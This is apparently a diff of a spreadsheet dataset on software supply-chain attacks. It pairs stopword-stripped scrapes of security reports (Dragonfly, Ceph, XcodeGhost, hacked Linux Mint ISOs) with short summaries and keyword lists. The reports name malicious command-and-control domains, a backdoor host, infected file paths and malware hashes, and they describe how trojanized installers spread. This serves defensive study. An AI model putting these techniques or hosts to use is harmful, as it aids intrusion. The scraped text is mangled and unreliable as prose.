attackers shifted focus watering hole attacks comprising number energyrelated websites injecting iframe redirected visitors another compromised legitimate website hosting lightsout exploit lightsout exploits either java internet explorer order drop oldrea karagany victim’s computer fact attackers compromised multiple legitimate websites stage operation evidence group strong technical capabilities september dragonfly began using version exploit known hello exploit landing page contains javascript fingerprints system identifying installed browser plugins victim redirected turn determines best exploit based information collected trojanized software ambitious attack vector used dragonfly compromise number legitimate software packages three different equipment providers targeted malware inserted software bundles made available download websites three companies made equipment used number industrial sectors including energy first identified trojanized software product used provide access programmable logic controller type devices vendor discovered attack shortly mounted already unique downloads compromised software second company compromised european manufacturer specialist type devices instance software package containing driver devices compromised symantec estimates trojanized software available download least weeks june july third firm attacked european company develops systems manage wind turbines biogas plants energy infrastructure symantec believes compromised software available download approximately days april dragonfly group technically adept able think strategically given size targets group found “soft underbelly” compromising suppliers invariably smaller less protected companies protection symantec following detections place protect customers running date versions products malware used attacks antivirus detections backdooroldrea trojankaragany trojankaraganygen1 intrusion prevention signatures attack lightsout exploit attack lightsout toolkit website technical details dragonfly attacks please read whitepaper statistics favorited views files shares downloads tags keywords related entries links related resource entered products applications support company copyright broadcom rights reserved term broadcom refers broadcom andor subsidiaries hosted higher logic behalf broadcom privacy policy cookie policy supply chain transparency terms copyright rights reserved powered higher logic</t>
+          <t>A group identified as Dragonfly by Symantec compromised legitimate software packages created by ICS equipment providers.</t>
         </is>
       </c>
       <c r="D22" t="inlineStr">
         <is>
           <t>https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments</t>
-        </is>
-      </c>
-      <c r="E22" t="inlineStr">
-        <is>
-          <t>['product', 'application', 'support', 'company', 'main', 'content', 'press', 'sign', 'auxiliary', 'navigation', 'press', 'main', 'navigation', 'press', 'toggle', 'navigation', 'search', 'option', 'home', 'community', 'community', 'community', 'enterprise', 'software', 'mainframe', 'software', 'symantec', 'enterprise', 'blog', 'blog', 'enterprise', 'software', 'mainframe', 'software', 'symantec', 'enterprise', 'event', 'event', 'enterprise', 'software', 'mainframe', 'software', 'symantec', 'enterprise', 'vmware', 'water', 'cool', 'group', 'enterprise', 'software', 'mainframe', 'software', 'symantec', 'enterprise', 'member', 'endpoint', 'protection', 'community', 'home', 'thread', 'library', 'event', 'member', 'western', 'energy', 'company', 'sabotage', 'ongoing', 'cyberespionage', 'campaign', 'range', 'target', 'energy', 'sector', 'attacker', 'ability', 'mount', 'sabotage', 'operation', 'victim', 'attacker', 'symantec', 'dragonfly', 'compromise', 'number', 'important', 'organization', 'purpose', 'sabotage', 'capability', 'open', 'damage', 'disruption', 'energy', 'supply', 'country', 'target', 'dragonfly', 'energy', 'grid', 'operator', 'major', 'electricity', 'generation', 'firm', 'petroleum', 'pipeline', 'operator', 'energy', 'industry', 'industrial', 'equipment', 'provider', 'majority', 'victim', 'range', 'malware', 'tool', 'disposal', 'capable', 'attack', 'number', 'different', 'vector', 'ambitious', 'attack', 'campaign', 'compromise', 'number', 'industrial', 'control', 'system', 'equipment', 'provider', 'software', 'remote', 'company', 'malware', 'software', 'computer', 'equipment', 'infection', 'attacker', 'targeted', 'organization', 'network', 'mean', 'operation', 'computer', 'campaign', 'footstep', 'major', 'malware', 'campaign', 'target', 'system', 'stuxnet', 'iranian', 'nuclear', 'program', 'primary', 'goal', 'dragonfly', 'broad', 'focus', 'espionage', 'persistent', 'access', 'current', 'objective', 'sabotage', 'optional', 'capability', 'addition', 'software', 'dragonfly', 'email', 'campaign', 'hole', 'attack', 'organization', 'group', 'main', 'malware', 'tool', 'former', 'custom', 'piece', 'malware', 'attacker', 'prior', 'publication', 'symantec', 'affected', 'victim', 'relevant', 'national', 'authority', 'computer', 'emergency', 'response', 'center', 'cert', 'respond', 'internet', 'incident', 'vendor', 'energetic', 'bear', 'operation', 'least', 'active', 'defense', 'aviation', 'company', 'european', 'energy', 'firm', 'early', 'campaign', 'sector', 'scope', 'group', 'malware', 'phishing', 'email', 'personnel', 'target', 'firm', 'group', 'watering', 'hole', 'attack', 'offensive', 'compromising', 'website', 'energy', 'order', 'website', 'turn', 'victim', 'computer', 'third', 'phase', 'campaign', 'legitimate', 'software', 'bundle', 'different', 'equipment', 'manufacturer', 'operation', 'high', 'degree', 'technical', 'capability', 'group', 'able', 'mount', 'attack', 'multiple', 'vector', 'numerous', 'third', 'party', 'website', 'multiple', 'organization', 'energy', 'sector', 'long', 'period', 'time', 'current', 'main', 'motive', 'cyberespionage', 'potential', 'sabotage', 'definite', 'secondary', 'capability', 'analysis', 'compilation', 'timestamp', 'attacker', 'group', 'activity', 'working', 'time', 'zone', 'information', 'attacker', 'figure', 'country', 'active', 'infection', 'attacker', 'information', 'computer', 'tool', 'main', 'piece', 'malware', 'attack', 'remote', 'access', 'tool', 'type', 'malware', 'attacker', 'access', 'control', 'computer', 'dragonfly', 'energetic', 'door', 'attacker', 'victim', 'computer', 'extract', 'datum', 'install', 'custom', 'malware', 'group', 'indication', 'capability', 'resource', 'victim', 'computer', 'oldrea', 'system', 'information', 'list', 'file', 'program', 'root', 'available', 'drive', 'datum', 'computer', 'outlook', 'address', 'book', 'configuration', 'file', 'datum', 'temporary', 'file', 'format', 'remote', 'server', 'attacker', 'majority', 'server', 'server', 'content', 'management', 'system', 'attacker', 'control', 'server', 'basic', 'control', 'panel', 'user', 'version', 'datum', 'particular', 'victim', 'second', 'main', 'tool', 'trojankaragany', 'karagany', 'available', 'underground', 'market', 'source', 'code', 'version', 'symantec', 'source', 'code', 'version', 'symantec', 'karagany', 'capable', 'datum', 'file', 'executable', 'file', 'computer', 'capable', 'additional', 'plugin', 'tool', 'password', 'screenshot', 'document', 'computer', 'symantec', 'majority', 'computer', 'attacker', 'percent', 'infection', 'piece', 'malware', 'similar', 'functionality', 'prompt', 'attacker', 'tool', 'unknown', 'multiple', 'attack', 'vector', 'infection', 'tactic', 'energy', 'sector', 'early', 'method', 'email', 'campaign', 'executive', 'senior', 'employee', 'company', 'email', 'malicious', 'attachment', 'email', 'subject', 'line', 'account', 'settlement', 'delivery', 'problem', 'single', 'gmail', 'address', 'campaign', 'symantec', 'different', 'organization', 'campaign', 'number', 'email', 'organization', 'attacker', 'focus', 'watering', 'hole', 'attack', 'number', 'website', 'iframe', 'visitor', 'legitimate', 'website', 'internet', 'order', 'victim', 'computer', 'fact', 'attacker', 'multiple', 'legitimate', 'website', 'operation', 'evidence', 'group', 'strong', 'technical', 'capability', 'dragonfly', 'version', 'exploit', 'landing', 'page', 'javascript', 'fingerprint', 'system', 'browser', 'plugin', 'victim', 'turn', 'good', 'information', 'software', 'ambitious', 'attack', 'vector', 'dragonfly', 'compromise', 'number', 'legitimate', 'software', 'package', 'different', 'equipment', 'provider', 'malware', 'software', 'bundle', 'available', 'download', 'website', 'company', 'equipment', 'number', 'industrial', 'sector', 'energy', 'software', 'product', 'access', 'programmable', 'logic', 'controller', 'type', 'device', 'vendor', 'attack', 'unique', 'download', 'software', 'second', 'company', 'european', 'manufacturer', 'specialist', 'type', 'device', 'instance', 'software', 'package', 'driver', 'device', 'symantec', 'estimate', 'software', 'available', 'download', 'least', 'week', 'european', 'company', 'system', 'wind', 'turbine', 'biogas', 'plant', 'energy', 'infrastructure', 'symantec', 'software', 'available', 'download', 'day', 'adept', 'able', 'size', 'target', 'group', 'soft', 'underbelly', 'supplier', 'small', 'company', 'protection', 'symantec', 'detection', 'place', 'customer', 'date', 'version', 'product', 'malware', 'attack', 'detection', 'prevention', 'signature', 'attack', 'toolkit', 'website', 'technical', 'detail', 'dragonfly', 'attack', 'whitepaper', 'statistic', 'view', 'file', 'share', 'tag', 'entry', 'link', 'related', 'resource', 'product', 'application', 'support', 'company', 'term', 'subsidiary', 'high', 'logic', 'behalf', 'policy', 'cookie', 'policy', 'supply', 'chain', 'transparency', 'term', 'copyright', 'right', 'high', 'logic']</t>
         </is>
       </c>
     </row>
@@ -1020,15 +930,14 @@
           <t>League of Legends and Path of Exile</t>
         </is>
       </c>
-      <c r="C23" t="inlineStr"/>
+      <c r="C23" t="inlineStr">
+        <is>
+          <t>Official releases of two popular online games were found to be compromised, downloading malware onto computers. The games that were used in the attack were online games League of Legends (LoL) and Path of Exile (PoE). Variants of the remote access Trojan (RAT) PlugX were found in the official releases of the three games, and appeared to target users based in certain countries in Asia. The infection chain is triggered by downloading the legitimate installer or updates for the game itself.  These compromised official releases were traced back to Garena, a consumer Internet platform provider in Asia. In an official post, Garena stated that computers and patch servers were infected with Trojans.</t>
+        </is>
+      </c>
       <c r="D23" t="inlineStr">
         <is>
           <t>https://blog.trendmicro.com/trendlabs-security-intelligence/plugx-malware-found-in-official-releases-of-league-of-legends-path-of-exile/</t>
-        </is>
-      </c>
-      <c r="E23" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -1045,17 +954,12 @@
       </c>
       <c r="C24" t="inlineStr">
         <is>
-          <t>skip navigation skip main content utilities subscriptions downloads containers support cases subscriptions downloads containers support cases products services products support production support development support product life cycles services consulting technical account management training certifications documentation enterprise linux jboss enterprise application platform openstack platform openshift container platform documentation ecosystem catalog partner ecosystem partner resources tools tools troubleshoot product issue packages errata customer portal labs configuration deployment troubleshoot labs insights increase visibility operations detect resolve technical issues impact business learn insights product center engage product team access updates ensure environments exposed known vulnerabilities product center updates advisories database labs keep systems secure hats specialized responses vulnerabilities view responses resources blog measurement severity ratings backporting policies product signing keys community customer portal community discussions private groups community activity customer events summit stories subscription value asked acted open source communities troubleshoot issue english select language english français infrastructure management enterprise linux satellite subscription management insights ansible automation platform cloud computing openshift openstack platform openshift container platform openshift openshift dedicated advanced cluster kubernetes advanced cluster management kubernetes quay openshift spaces openshift service storage gluster storage hyperconverged infrastructure ceph storage openshift data foundation runtimes runtimes jboss enterprise application platform data grid jboss server build keycloak support spring boot build nodejs build quarkus integration automation application foundations fuse 3scale management products warning message comments blog blog feed recent posts product blog moved 20190319t1938170000 product openpgp 20180822t1330000000 spectre variant scanning tool 20180718t1330000000 hat’s disclosure process 20180710t1300000000 join francisco summit 20180423t1430000000 monthly archives september march june january june november january february december january september february april november january july august december february august september october november january february april june july august september october november december january february april june july august september october november december january march april june july september october november december january march april june october november january february march april september october november february april july august march work licensed creative commons attributionsharealike unported license extent possible dedicated copyright code configuration snippets included work public domain worldwide pursuant public domain dedication software distributed without warranty learn important notice regarding signing distribution ceph storage ubuntu centos fabio olive leite published 20150917t1200000000 last updated 20160224t1813170000 english translations currently exist last week investigated intrusion sites ceph community project cephcom inktank downloadinktankcom hosted computer system outside infrastructure downloadinktankcom provided releases ceph product ubuntu centos operating systems product versions signed inktank signing 5438c7019dceeead cephcom provided upstream packages ceph community versions signed ceph signing 7ebfdd5d17ed316d investigation intrusion ongoing initial focus integrity software distribution channel sites date investigation discovered compromised code available download sites fully rule possibility compromised code available download point past downloadinktankcom builds verified matching known good builds clean system however longer trust integrity inktank signing therefore resigned versions ceph storage products standard release customers ceph storage products versions signed release cephcom ceph community created signing e84ac2c0460f3994 verifying downloads cephcom details customer data stored compromised system system usernames hashes fixed passwords supplied customers authenticate downloads reiterate based investigation date customers centos ubuntu versions ceph storage take action precautionary measure download rebuilt newlysigned product versions identified notified customers directly customers using ceph storage products enterprise linux affected issue products also affected customers questions need help moving builds contact support technical account manager language english tags author active contributor points fabio olive leite long time free open source software user hacker ambassador currently manager product comments formerly twitter quick links downloads subscriptions support cases customer service product documentation help contact customer portal customer portal login assistance site info trust browser support policy accessibility awards recognition colophon related sites redhatcom developersredhatcom connectredhatcom cloudredhatcom systems status subscription value jobs legal privacy links jobs events locations contact blog diversity equity inclusion cool stuff store summit copyright legal privacy links privacy statement terms policies guidelines digital accessibility formatting tips common uses markdown code blocks code surrounded tildes easier read linksurls customer portalhttpsaccessredhatcom learn close</t>
+          <t>The Ceph community site and the Inktank download site were hacked.  Malicious Ceph and Inktank applications were signed by a compromised key.</t>
         </is>
       </c>
       <c r="D24" t="inlineStr">
         <is>
           <t>https://access.redhat.com/blogs/766093/posts/2176181</t>
-        </is>
-      </c>
-      <c r="E24" t="inlineStr">
-        <is>
-          <t>['navigation', 'main', 'content', 'utility', 'subscription', 'download', 'container', 'case', 'subscription', 'download', 'container', 'case', 'product', 'service', 'product', 'production', 'support', 'development', 'support', 'product', 'life', 'cycle', 'service', 'technical', 'account', 'training', 'certification', 'documentation', 'enterprise', 'enterprise', 'application', 'platform', 'openstack', 'platform', 'openshift', 'container', 'platform', 'documentation', 'ecosystem', 'catalog', 'partner', 'ecosystem', 'partner', 'resource', 'tool', 'tool', 'product', 'issue', 'package', 'configuration', 'troubleshoot', 'lab', 'insight', 'visibility', 'operation', 'technical', 'issue', 'impact', 'business', 'insight', 'product', 'center', 'product', 'team', 'access', 'update', 'environment', 'vulnerability', 'product', 'center', 'update', 'advisory', 'database', 'lab', 'system', 'secure', 'hat', 'response', 'response', 'resource', 'blog', 'measurement', 'severity', 'rating', 'backporting', 'policy', 'product', 'key', 'community', 'customer', 'portal', 'community', 'discussion', 'private', 'group', 'community', 'activity', 'customer', 'event', 'summit', 'story', 'subscription', 'value', 'open', 'source', 'community', 'issue', 'select', 'language', 'enterprise', 'subscription', 'management', 'insight', 'ansible', 'automation', 'platform', 'platform', 'openshift', 'container', 'platform', 'openshift', 'openshift', 'advanced', 'cluster', 'cluster', 'management', 'openshift', 'space', 'service', 'storage', 'gluster', 'storage', 'hyperconverged', 'infrastructure', 'ceph', 'storage', 'openshift', 'datum', 'foundation', 'runtime', 'jboss', 'enterprise', 'application', 'platform', 'data', 'grid', 'jboss', 'server', 'support', 'spring', 'boot', 'build', 'nodejs', 'quarkus', 'integration', 'automation', 'application', 'foundation', 'management', 'product', 'message', 'comment', 'blog', 'blog', 'recent', 'post', 'product', 'blog', 'product', 'openpgp', 'spectre', 'variant', 'tool', 'hat', 'disclosure', 'process', 'summit', 'monthly', 'archive', 'work', 'creative', 'commons', 'attributionsharealike', 'unported', 'license', 'extent', 'possible', 'dedicated', 'copyright', 'code', 'configuration', 'snippet', 'work', 'public', 'domain', 'worldwide', 'pursuant', 'public', 'domain', 'dedication', 'software', 'warranty', 'important', 'notice', 'distribution', 'ceph', 'storage', 'cento', 'last', 'english', 'translation', 'last', 'week', 'intrusion', 'site', 'community', 'project', 'computer', 'system', 'infrastructure', 'release', 'ceph', 'product', 'ubuntu', 'cento', 'operating', 'system', 'product', 'version', 'signing', 'upstream', 'package', 'ceph', 'community', 'version', 'ceph', '7ebfdd5d17ed316d', 'investigation', 'intrusion', 'ongoing', 'initial', 'focus', 'integrity', 'software', 'distribution', 'channel', 'site', 'date', 'investigation', 'code', 'available', 'download', 'site', 'possibility', 'code', 'available', 'download', 'point', 'past', 'good', 'clean', 'system', 'integrity', 'signing', 'version', 'ceph', 'storage', 'product', 'standard', 'customer', 'ceph', 'storage', 'product', 'version', 'release', 'ceph', 'community', 'signing', 'verifying', 'customer', 'datum', 'system', 'system', 'username', 'hash', 'password', 'customer', 'download', 'investigation', 'date', 'customer', 'ubuntu', 'version', 'ceph', 'storage', 'action', 'precautionary', 'measure', 'download', 'newlysigned', 'product', 'version', 'customer', 'customer', 'ceph', 'storage', 'product', 'enterprise', 'issue', 'product', 'customer', 'question', 'help', 'build', 'contact', 'support', 'technical', 'account', 'manager', 'language', 'english', 'tag', 'author', 'active', 'contributor', 'long', 'time', 'free', 'open', 'source', 'software', 'user', 'hacker', 'ambassador', 'manager', 'product', 'comment', 'quick', 'link', 'subscription', 'support', 'case', 'customer', 'service', 'product', 'documentation', 'contact', 'customer', 'portal', 'customer', 'portal', 'login', 'assistance', 'site', 'support', 'policy', 'accessibility', 'award', 'recognition', 'site', 'status', 'subscription', 'value', 'job', 'legal', 'privacy', 'link', 'job', 'event', 'location', 'contact', 'blog', 'diversity', 'equity', 'inclusion', 'cool', 'stuff', 'store', 'summit', 'copyright', 'legal', 'privacy', 'link', 'privacy', 'statement', 'term', 'policy', 'digital', 'accessibility', 'formatting', 'tip', 'common', 'markdown', 'code', 'tilde']</t>
         </is>
       </c>
     </row>
@@ -1072,17 +976,12 @@
       </c>
       <c r="C25" t="inlineStr">
         <is>
-          <t>menu tools atoms consulting attack novel malware xcodeghost modifies xcode infects apple apps hits store people reacted read share claud xiao september category malware prevention unit tags apple baidu keyraider weibo xcode xcodeghost post also available japanese update since reports original posting september three additional xcodeghost updates published available wednesday chinese developers disclosed malware sina weibo alibaba researchers posted analysis report malware giving name xcodeghost investigated malware identify spreads techniques uses impact xcodeghost first compiler malware malicious code located macho object file repackaged versions xcode installers malicious installers uploaded baidu’s cloud file sharing service used chinese iosos developers xcode apple’s official tool developing apps clear chinese developers downloaded trojanized packages update following notification palo alto networks malicious files hosted file sharing services baidu removed files xcodeghost exploits xcode’s default search paths system frameworks successfully infected multiple apps created infected developers least apps submitted store successfully passed apple’s code review published public download sixth malware made official store lbtm instastock findandcall jekyll faketor xcodeghost’s primary behavior infected apps collect information devices upload data command control servers malware exposed interesting attack vector targeting compilers used create legitimate apps technique could also adopted attack enterprise apps apps much dangerous ways distributing malicious xcode build china places around world sometimes network speeds slow downloading large files apple’s servers standard xcode installer nearly chinese developers choose download package sources copies colleagues searching “xcode xcode downloading google first page search results figure found months someone posted xcode download links multiple forums websites including douban swiftmi cocoachina oschina chinese developers frequently visit figure google search results xcode downloading chinese posts provided links download versions xcode including beta versions links direct baidu yunpan cloud based file storage sharing service figure malicious xcode shared baidu yunpan downloaded xcode installers found versions xcode infected attempting verify installers’ code signing signature it’s clear extra files added xcode figure figure code signing verification shows extra files xcode additional files listed xcodeappcontentsdeveloperplatformsiphoneosplatformdevelopersdkslibraryframeworkscoreservicesframeworkcoreservice xcodeappcontentsdeveloperplatformsiphoneosplatformdevelopersdkslibraryprivateframeworksidebundleinjectionframework xcodeappcontentsdeveloperplatformsiphonesimulatorplatformdevelopersdkslibraryframeworkscoreservicesframeworkcoreservice xcodeappcontentsdeveloperplatformsiphonesimulatorplatformdevelopersdkslibraryprivateframeworksidebundleinjectionframework xcodeappcontentsdeveloperplatformsmacosxplatformdevelopersdkslibraryframeworkscoreservicesframeworkcoreservice xcodeappcontentsdeveloperplatformsmacosxplatformdevelopersdkslibraryprivateframeworksidebundleinjectionframework attack works primary malicious component xcodeghost infected version “coreservices” different previous malware instances file neither macho executable macho dynamic library macho object file used llvm linker can’t directly execute abnormal file format cause crashes errors analyzing format parsers like machoview editor macho template jtool coreservices contain many fundamental system services almost complex apps reply compiled xcode search coreservices framework predefined paths link developer’s code xcodeghost implemented malicious code coreservices object file copies file specific position xcode’s default framework search paths hence code malicious coreservices file added compiled infected xcode without developers’ knowledge malicious coreservices file primarily implements extra code uiwindow class uidevice class uiwindow class manages coordinates views displays device screen almost every uiwindow instance it’s running infected executed either simulator devices malicious code collect system information using uidevice appleincreserved method collected information includes current time current infected app’s name app’s bundle identifier current device’s name type current system’s language country current device’s uuid network type figure collecting system information xcodeghost encrypt information upload server http protocol different versions xcodeghost found three domain names httpinitcrashanalyticscom httpiniticlouddiagnosticscom httpiniticloudanalysiscom figure uploading stolen information server note domain name “icloudanalysiscom” also used sample trojan keyraider recently found malware store according joeyblue sina weibo least famous apps infected xcodeghost successfully landed store confirmed downloaded netease cloud music comneteasecloudmusic apples store china region latest version infoplist shows built xcode 6e35b main executable file malicious xcodeghost code present figure figure figure infected netease apple store figure xcodeghost present infected netease figure decompiled xcodeghost functions netease risks compiler malware idea starting first proofofconcept written thompson years real compiler malware discovered many platforms compared malware xcodeghost’s behaviors especially significant harmful code pass store code review however xcodeghost disclosed easy trojanize apps built xcode fact attackers need trick developers downloading untrusted xcode packages write malware directly drops malicious object file xcode directory without special permission additionally although apple’s code review store submissions strict applications never reviewed appleif used enterprise internally example distributed inhouse won’t storein example also infected lots apps directly distributed internet stores situations xcode compiler malware much aggressive risky it’s difficult users developers aware malware similar attacks deeply hidden bypassing store code review characteristics apple developers always xcode directly downloaded apple regularly check installed xcode’s code signing integrity prevent xcode modified malware appendix xcodeghost file hashes 89c912d47165a3167611cebf74249f981a4490d9cdb842eccc6771ee4a97e07c coreservices b1f567afbf02b6993a1ee96bfdb9c54010a1ad732ab53e5149dda278dd06c979 coreservices f5a63c059e91f091d3f1e5d953d95d2f287ab6894552153f1cf8714a5a5bed2d coreservices 2fde065892a8f1c9f498e6d21f421dbc653888f4102f91fc0fa314689d25c055 xcode62dmg c741af30aef915baa605856a5f662668fba1ae94a8f52faf957b8a52c8b23614 xcode64dmg updates palo alto networks sign receive latest news cyber intelligence research please enter email address please mark robot submitting form agree terms acknowledge privacy statement popular resources resource center blog communities tech docs unit sitemap legal notices privacy terms documents account manage subscriptions report vulnerability palo alto networks rights reserved</t>
+          <t>XcodeGhost is the first compiler malware in OS X. Its malicious code is located in a Mach-O object file that was repackaged into some versions of Xcode installers. These malicious installers were then uploaded to the Baidu cloud file sharing service for use by Chinese iOS/OS X developers. Xcode is the official tool for developing iOS or OS X apps and it is clear that some Chinese developers have downloaded these Trojanized packages.</t>
         </is>
       </c>
       <c r="D25" t="inlineStr">
         <is>
           <t>https://unit42.paloaltonetworks.com/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/</t>
-        </is>
-      </c>
-      <c r="E25" t="inlineStr">
-        <is>
-          <t>['menu', 'tool', 'attack', 'novel', 'malware', 'apple', 'app', 'store', 'people', 'share', 'claud', 'unit', 'available', 'japanese', 'update', 'report', 'original', 'additional', 'xcodeghost', 'update', 'available', 'chinese', 'developer', 'researcher', 'analysis', 'report', 'malware', 'name', 'malware', 'spread', 'technique', 'impact', 'macho', 'object', 'file', 'version', 'xcode', 'malicious', 'installer', 'file', 'sharing', 'service', 'chinese', 'iosos', 'developer', 'apple', 'official', 'tool', 'app', 'clear', 'chinese', 'developer', 'package', 'notification', 'malicious', 'file', 'file', 'sharing', 'service', 'file', 'default', 'search', 'path', 'system', 'framework', 'multiple', 'app', 'infected', 'developer', 'least', 'app', 'store', 'apple', 'code', 'review', 'public', 'download', 'sixth', 'malware', 'official', 'store', 'primary', 'behavior', 'app', 'information', 'device', 'datum', 'command', 'control', 'server', 'interesting', 'attack', 'vector', 'targeting', 'compiler', 'legitimate', 'app', 'technique', 'attack', 'enterprise', 'app', 'app', 'much', 'dangerous', 'way', 'malicious', 'xcode', 'place', 'world', 'network', 'speed', 'slow', 'large', 'file', 'apple', 'server', 'standard', 'installer', 'chinese', 'developer', 'download', 'package', 'source', 'colleague', 'xcode', 'xcode', 'first', 'page', 'search', 'result', 'figure', 'month', 'download', 'multiple', 'forum', 'website', 'chinese', 'developer', 'figure', 'search', 'result', 'chinese', 'post', 'link', 'version', 'xcode', 'beta', 'version', 'link', 'direct', 'file', 'storage', 'sharing', 'service', 'figure', 'malicious', 'xcode', 'installer', 'version', 'verify', 'installer', 'code', 'signing', 'signature', 'clear', 'extra', 'file', 'xcode', 'figure', 'figure', 'code', 'signing', 'verification', 'extra', 'file', 'xcode', 'additional', 'file', 'primary', 'malicious', 'component', 'version', 'coreservice', 'different', 'previous', 'malware', 'instance', 'macho', 'executable', 'macho', 'dynamic', 'library', 'macho', 'object', 'file', 'llvm', 'linker', 'abnormal', 'file', 'format', 'cause', 'error', 'format', 'parser', 'editor', 'macho', 'template', 'coreservice', 'many', 'fundamental', 'system', 'service', 'complex', 'app', 'xcode', 'search', 'coreservice', 'framework', 'path', 'developer', 'code', 'xcodeghost', 'malicious', 'code', 'coreservice', 'object', 'file', 'copy', 'specific', 'position', 'xcode', 'default', 'framework', 'search', 'path', 'code', 'malicious', 'coreservice', 'file', 'xcode', 'developer', 'knowledge', 'malicious', 'coreservice', 'file', 'extra', 'code', 'uiwindow', 'class', 'uidevice', 'class', 'uiwindow', 'class', 'coordinate', 'view', 'display', 'device', 'screen', 'uiwindow', 'instance', 'simulator', 'device', 'malicious', 'code', 'system', 'information', 'uidevice', 'appleincreserved', 'method', 'information', 'current', 'time', 'current', 'app', 'name', 'app', 'bundle', 'current', 'device', 'name', 'type', 'current', 'system', 'language', 'country', 'current', 'device', 'uuid', 'network', 'type', 'figure', 'system', 'information', 'information', 'server', 'http', 'protocol', 'different', 'version', 'domain', 'name', 'figure', 'information', 'server', 'note', 'domain', 'name', 'sample', 'least', 'famous', 'app', 'store', 'netease', 'cloud', 'music', 'comneteasecloudmusic', 'apple', 'late', 'version', 'infoplist', 'show', 'main', 'executable', 'file', 'malicious', 'xcodeghost', 'code', 'present', 'figure', 'figure', 'figure', 'netease', 'apple', 'store', 'figure', 'present', 'netease', 'figure', 'function', 'netease', 'risk', 'idea', 'year', 'real', 'compiler', 'many', 'platform', 'behavior', 'significant', 'harmful', 'code', 'pass', 'store', 'code', 'review', 'easy', 'trojanize', 'app', 'fact', 'attacker', 'trick', 'developer', 'untrusted', 'xcode', 'package', 'malicious', 'object', 'file', 'xcode', 'directory', 'special', 'permission', 'apple', 'code', 'review', 'store', 'submission', 'strict', 'application', 'appleif', 'enterprise', 'example', 'inhouse', 'example', 'lots', 'app', 'internet', 'store', 'situation', 'compiler', 'aggressive', 'risky', 'difficult', 'user', 'developer', 'aware', 'malware', 'similar', 'attack', 'store', 'code', 'review', 'characteristic', 'apple', 'developer', 'apple', 'xcode', 'code', 'signing', 'integrity', 'malware', 'xcodeghost', 'file', 'hash', 'coreservice', 'coreservice', 'coreservice', 'network', 'sign', 'late', 'news', 'cyber', 'intelligence', 'research', 'email', 'address', 'mark', 'robot', 'form', 'term', 'privacy', 'statement', 'popular', 'resource', 'resource', 'center', 'blog', 'community', 'unit', 'sitemap', 'legal', 'notice', 'privacy', 'term', 'document', 'account', 'manage', 'subscription', 'report', 'vulnerability', 'network', 'right']</t>
         </is>
       </c>
     </row>
@@ -1097,15 +996,14 @@
           <t>ScreenOS</t>
         </is>
       </c>
-      <c r="C26" t="inlineStr"/>
+      <c r="C26" t="inlineStr">
+        <is>
+          <t>Malicious code was inserted in the operating system of Juniper NetScreen VPN routers. This unauthorized code enabled remote administrative access, and allowed passive decryption of VPN traffic. The first vulnerability was done by implanting back door in the SSH password checker and the second one happened by compromising a pseudorandom number generator.</t>
+        </is>
+      </c>
       <c r="D26" t="inlineStr">
         <is>
           <t>https://forums.juniper.net/t5/Security-Incident-Response/Important-Announcement-about-ScreenOS/ba-p/285554</t>
-        </is>
-      </c>
-      <c r="E26" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -1122,17 +1020,12 @@
       </c>
       <c r="C27" t="inlineStr">
         <is>
-          <t>linux mint blog news mint team search recent posts monthly news february monthly news january edge available linux mint upgrade linux mint linux mint “virginia” released archives archives select month march january december october september august july june april february january december november september august july june april march february january december november october september july june april march february january december october september july june april march february january december october september august july june april march january december october september august july june april march january december november october september july june april march february january december november october september august july june april march february january december november october september august july june april march february january december november october september august july june april march february december november october september august july june march february january december november october september august july june april march february january december november october september august july june april march february january december november october september august july june april march february january december november october september august july june april march february january december november october september august july june april march february january december november october september august beware hacked isos downloaded linux mint february 20th february clem comments sorry come news exposed intrusion today brief shouldn’t impact many people impacts it’s important read information happened hackers made modified linux mint backdoor managed hack website point affect know compromised edition linux mint cinnamon edition downloaded another release another edition affect downloaded torrents direct http link doesn’t affect either finally situation happened today impact people downloaded edition february 20th check compromised still file check signature command “md5sum yourfileiso” yourfileiso name valid signatures 6e7f7e03500747c6c3bfece2c9c8394f linuxmint173cinnamon32bitiso e71a2aad8b58605e906dbea444dc4983 linuxmint173cinnamon64bitiso 30fef1aa1134c5f3778c77c4417f7238 linuxmint173cinnamonnocodecs32bitiso 3406350a87c201cdca0927b1bc7c2ccd linuxmint173cinnamonnocodecs64bitiso df38af96e99726bb0a1ef3e5cd47563d linuxmint173cinnamonoem64bitiso still burnt stick boot computer virtual machine offline turn router doubt load live session live session file varlibmancy infected affected delete burnt trash disc burnt format stick installed computer computer offline backup personal data reinstall format partition change passwords sensitive websites email particular everything back normal took server we’re fixing issue hacked isos hosted backdoor connects absentvodkacom lead sofia bulgaria name people don’t know roles investigation start don’t know motivation behind attack efforts made attack project goal hurt we’ll touch authorities firms confront people behind you’ve affected please know post navigation previous previous post monthly news january next next post forums users change passwords comments gunvolt says february lots server problems lately transparent edit clem we’ve always transparent it’s something people certain extent it’s also easier things that’s brought anyway that’s regarding servers servers time attacks suffered past ddos though it’s also important communicate attack we’re talking downtime inconvenience call action need people affected understand don’t hurt used going forward reply clem says february doubt question please don’t hesitate tried stick important information understand unsettling i’ll happy answer many questions reply dana says february dumb question repositories affected upgrade today surprised firmware upgraded linux 319032generic 3714041ubuntu edit clem reply sebbie says february downloads torrent also affevted torrent difficult compromise edit clem weren’t reply aritz cracker says february heyo seems like download pages still point hacked isos honestly reason noticed downloading isos bulk using wget strange address fact file anyway download pages going fixed anytime soon want burn family friend… scammed “windows tech support” scammers want show joys linux mint edit clem thanks reporting second attack means we’re still vulnerable shutting server right reply k0nsl says february i’ll question without knowing intrinsic details specific details posted breach anything fact you’re running wordpress best wishes thanks heads k0nsl edit clem breach made wordpress wwwdata shell reply lucky donegan says february time stamp upon file mention created server hopefully sufficient info intrusion server version cinnamon weather 32bit 64bit version affected lucky edit clem today 64bit definitely 32bit didn’t show links found bulgarian server looks like preparing compromise well later reply gunvolt says february that’s ubuntu package mint it’s firmware it’s system component reply james says february i’ve trying install fresh version linux mint machine corrupted last couple hours thought something weird unable connect internet installing able reach router stupidly checked checksum using anyoneis anyone going looking ‘functional’ difference genuine hacked versions interested know whatif data keyboard input stolen thank letting know edit clem it’s mint tsunami running here’s info httpblogmalwaremustdieorg201305storyofunixtrojantsunamiircbotwhtml reply john says 